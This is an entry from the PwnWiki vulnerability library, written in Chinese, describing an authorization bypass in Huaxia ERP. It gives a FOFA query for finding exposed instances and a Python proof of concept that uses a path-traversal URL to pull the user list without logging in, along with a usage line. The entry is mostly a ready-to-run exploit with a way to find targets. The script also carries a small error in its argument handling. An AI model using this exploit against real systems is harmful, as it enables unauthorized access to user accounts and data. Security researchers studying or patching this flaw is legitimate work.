◆◆0

华夏ERP授权绕过漏洞（二）

免费、自由、人人可编辑的漏洞库--PwnWiki.com

,

FOFA

title="华夏ERP"

POC

import sys,requests

def main(ip):
    url = "{ip}/user/login/../../user/getUserList?search=%7B%22userName%22%3A%22%22%2C%22loginName%22%3A%22%22%7D&currentPage=1&pageSize=15".format(ip=ip)
    res = requests.get(url,verify=False,timeout=5)
    if res.status_code == 200:
        print("+ {ip} 访问成功\n{data}".format(ip=ip,data=res.text))
main(sys.argv1)

python3 poc.py http://ip:port

参考

http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%8D%8E%E5%A4%8FERP/%E5%8D%8E%E5%A4%8FERP%E7%AC%AC%E4%BA%8C%E5%A4%84%E6%8E%88%E6%9D%83%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md

pwnwiki.com

返回顶部